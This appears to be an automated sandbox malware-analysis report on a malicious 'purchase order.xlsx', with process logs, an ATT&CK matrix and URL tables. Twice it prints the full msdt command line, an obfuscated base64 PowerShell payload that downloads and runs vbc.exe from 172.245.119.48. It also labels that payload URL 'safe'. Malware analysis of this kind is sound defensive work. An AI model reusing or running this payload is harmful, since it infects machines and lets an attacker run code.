        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.dllJump to dropped file
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path Interception11
        Process Injection
        11
        Masquerading
        OS Credential Dumping1
        Application Window Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Non-Application Layer Protocol
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts12
        Exploitation for Client Execution
        Boot or Logon Initialization Scripts1
        Extra Window Memory Injection
        1
        Disable or Modify Tools
        LSASS Memory1
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
        Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager13
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
        Ingress Tool Transfer
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        Extra Window Memory Injection
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        purchase order.xlsx17%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
        SourceDetectionScannerLabelLink
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll0%ReversingLabs
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        http://172.245.119.48/870/vbc.exe0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        http://172.245.119.48/shipping_invc/document.html0%Avira URL Cloudsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://172.245.119.48/870/vbc.exefalse
        • Avira URL Cloud: safe
        unknown
        http://172.245.119.48/shipping_invc/document.htmlfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
          high
          https://login.microsoftonline.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
            high
            https://shell.suite.office.com:144334C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
              high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                high
                https://autodiscover-s.outlook.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                  high
                  https://roaming.edog.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                    high
                    https://cdn.entity.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://api.addins.omex.office.net/appinfo/query34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                      high
                      https://clients.config.office.net/user/v1.0/tenantassociationkey34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                        high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          high
                          https://powerlift.acompli.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://lookup.onenote.com/lookup/geolocation/v134C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                            high
                            https://cortana.ai34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                              high
                              https://cloudfiles.onenote.com/upload.aspx34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                  high
                                  https://entitlement.diagnosticssdf.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                    high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      high
                                      https://api.aadrm.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                        high
                                        https://api.microsoftstream.com/api/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                          high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                            high
                                            https://cr.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                              high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://portal.office.com/account/?ref=ClientMeControl34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                high
                                                https://graph.ppe.windows.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplate34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.aadrm.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            high
                                                            https://dev0-api.acompli.net/autodetect34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.ms34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.diagnosticssdf.office.com/v2/feedback34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                              high
                                                              https://api.powerbi.com/v1.0/myorg/groups34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                high
                                                                https://web.microsoftstream.com/video/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                  high
                                                                  https://api.addins.store.officeppe.com/addinstemplate34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://graph.windows.net34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    high
                                                                    https://dataservice.o365filtering.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://officesetup.getmicrosoftkey.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://analysis.windows.net/powerbi/api34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                      high
                                                                      https://prod-global-autodetect.acompli.net/autodetect34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                        high
                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                          high
                                                                          https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                            high
                                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                              high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                high
                                                                                https://ncus.contentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                  high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                    high
                                                                                    http://weather.service.msn.com/data.aspx34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                      high
                                                                                      https://apis.live.net/v5.0/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                        high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                          high
                                                                                          https://messaging.lifecycle.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                            high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                              high
                                                                                              https://management.azure.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.com34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/ios34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                      high
